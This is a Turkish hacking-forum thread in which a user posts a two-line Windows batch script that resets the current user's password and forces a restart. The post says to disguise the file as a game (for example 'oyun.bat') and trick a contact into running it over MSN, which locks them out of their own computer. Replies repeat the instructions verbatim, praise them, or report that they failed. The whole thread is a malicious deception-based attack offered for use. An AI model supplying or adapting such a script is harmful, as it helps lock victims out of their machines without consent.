msn'de karşı pc'ye şifre koyma

mysticwolf

Üye
16 Ara 2006
60
0
Msn den karsındakı pc ye sıfre koyabılırsın
arkladaslar cok basıt bılenler vardır ama bılmeyenler ıcın gusel bısey
ilk olarak yeni metin belgesi açıyoruz
sonrada verdiğim kodları yazıyoruz ve uzantısını .bat olarak kaydediyoruz (örnek: oyun.bat)
code:
net user %username% 123456
shutdown -r
bu komutta 123456 yazılı kısım kişinin pc ye koyacagımız şifredir siz deiştirip istediğiniz bir şifreyi koyabilirsiniz
şimdii gelelim kullanıma
verdiğim komutları yazıp ‘’ .bat ‘’ olarak kaydetikten sonra oluşan programı msnden karşıtarafa bişekile kabul ettirip yolluyorsunuz adam alınca açtıgı anda pc'ye şifre yerleşiyor ve pc otomatik olarak kapanıyor bu kapamayı kişi durduramaz
görev yönrticisini .

ikrahan

Yeni üye
12 Ağu 2007
10
0
iyide kardeş pc kapandı güzel açılırken şifre istiyor verdiğiim şifreyi yazıyor karşı taraf kabul etmiyor

gulsehri

Yeni üye
4 Eki 2007
2
0
COK GUZEL BIR BROGRAM
Msn den karsındakı pc ye sıfre koyabılırsın
arkladaslar cok basıt bılenler vardır ama bılmeyenler ıcın gusel bısey
ilk olarak yeni metin belgesi açıyoruz
sonrada verdiğim kodları yazıyoruz ve uzantısını .bat olarak kaydediyoruz (örnek: oyun.bat)
code:
net user %username% 123456
shutdown -r
bu komutta 123456 yazılı kısım kişinin pc ye koyacagımız şifredir siz deiştirip istediğiniz bir şifreyi koyabilirsiniz
şimdii gelelim kullanıma
verdiğim komutları yazıp ‘’ .bat ‘’ olarak kaydetikten sonra oluşan programı msnden karşıtarafa bişekile kabul ettirip yolluyorsunuz adam alınca açtıgı anda pc'ye şifre yerleşiyor ve pc otomatik olarak kapanıyor bu kapamayı kişi durduramaz
görev yönrticisini .

aim

Yeni üye
4 Eki 2007
8
0
ankara/bahçeli-emek
kanks biz bu dosyayı hazırlarken aynen yazcaz dediğini başka pc de oluyorsa bizde de olması gerekmez mi o zaman pc miz kapanır gerçi biz şifreyi unutmadıysak açarız karşımızdaki kişininki direct kapancağı için o şifrei hiç görmediğinden dolayı açamıcak tüm bu söylediklerimi unutun eğer biz bunu hazırlarken bizde etki ederse kazdığımız kuyuya kendimiz düşmüş oluruz artı şifrei yazdık gene açılmıo o zaman eller havaya emeğine saygı duyuyorum saol ama bazı şeylerin ayrıntıları da gerekir sen ne diyorsun şimdi bizde etki eder mi

Son düzenleme:

microgrup

Yeni üye
5 Eki 2007
3
0
cehennem
süpermiş kankam gayet dogru bende dah önceden kullanıyordum we butun arkadaşlaras tafsiye ederim şimdiden herkeze başarılar dilerim

mustafakrl

Yeni üye
31 Eki 2007
1
0
arkadasım bende pc kullanmayı gelıstırmek ıstıyorum ama bununla ılgılı cevremde ne bır kurs var nede bana yardım edebılecek bırı benım su anlık yapa bıldıgıö format atabılıyorum program yukleye bılıyorum kendımı gelıstırmek ıcın benım anlaya bılecegım sevıyede ogretıcı bı seyler bulabılecegım bı yer varmı yada yardım edecek bırılerı eger cevap verırsen sevınırım sımdıden tesekkurler

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.